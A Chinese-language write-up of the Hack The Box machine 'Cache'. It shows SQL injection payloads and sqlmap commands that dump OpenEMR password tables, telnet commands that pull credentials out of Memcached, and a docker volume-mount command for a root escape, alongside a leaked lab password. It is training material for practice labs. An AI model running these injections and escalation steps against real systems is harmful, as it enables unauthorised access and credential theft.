HTB-Cache
- 信息收集
- 80端口
- 立足
- www-data -> ash
- ash -> luffy
- luffy -> root

信息收集


80端口
主页是一些hacker的介绍。

作者介绍能收集可能的用户名ASH以及有一个其他项目可能有用,如下:
“Check out his other projects like Cache:HMS(Hospital Management System) “

还有一个Contact业务,输入超链接测试是否存在脚本会访问连接。同时也进行sql注入测试,均无收获。

看看登陆业务。

随便输入会进入一个建设中的页面。

目录扫描

查看与login有关的js,所以说为什么我能随便输入账号密码登录呢。

还是把这个留在这里吧:ash:H@v3_fun。额,线索断了,别忘了作者还有一个HMS(Hospital Management System)。尝试添加hms.htb并访问。


对hms.htb进行目录扫描。

在http://hms.htb/admin.php发现了OpenEMR的版本是5.0.1(3)。

http://hms.htb/portal/还有一个患者门户的登陆业务。

到最后一步发送请求就没动静了。

知道了具体的版本后可以查看一下版本漏洞。这有一篇5.0.1的漏洞报告。

从中知道sql_patch.php也可以查看版本。

跟着报告走一遍看看能不能利用成功。

先到前面的病患门户那个界面。

再导航到/portal/add_edit_event_user.php

接着导航到/portal/get_profile.php

文章所说在这会有几个SQL注入的漏洞。选了个短的方便注入。
add_edit_event_user.php?eid=1 AND EXTRACTVALUE(0,CONCAT(0x5c,VERSION()))

查询表名1 AND EXTRACTVALUE(0,CONCAT(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database())))。

感觉没显示完全,配合截断看看。
1 AND EXTRACTVALUE(0,CONCAT(0x5c,(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),15,30))))
算了还是用burp suite跑算了。确实有点多。

先去看看sqlmap怎么说,如果不行就写脚本来跑。貌似这个绕过验证的漏洞是有时间限制。请求复制下来。


获取数据库:sqlmap -r res -dbs

获取表名:sqlmap -r res -D openemr -table

查看users_secure表:sqlmap -r res -D openemr -T users_secure --dump


这样我们有了两个密码,也可能是openemr_admin:xxxxxx

去试试吧,exploit。

能够执行命令。

立足
反弹shell。

有两个用户。

www-data -> ash
利用我们前面获得的凭证登录ash。

ash -> luffy
本地的11211端口在监听。

可能是Memcached。

Memcached
是一种易于使用的高性能内存数据存储。它提供了一项成熟的可扩展开源解决方案,能够实现亚毫秒级响应时间并用作缓存或会话存储。Memcached
非常热门,可为 Web、移动应用程序、游戏、广告技术和电子商务领域的实时应用程序提供支持。
使用telnet 127.0.0.1 11211连接。

获取所有key:stats items

查询items 1的内容:stats cachedump 1 0

get获取user和passwd:get user get passwd

先输入ctrl+],再输入quit退出。

使用我们获取的密码切换到路飞。

luffy -> root
查看id能够看到luffy在docker组。

查看容器。

有一个ubuntu,挂载它。
docker run -it -v /:/host/ ubuntu chroot /host/ bash (将其挂载到chroot上)

制作shell。

退出docker,在根目录发现bash。





















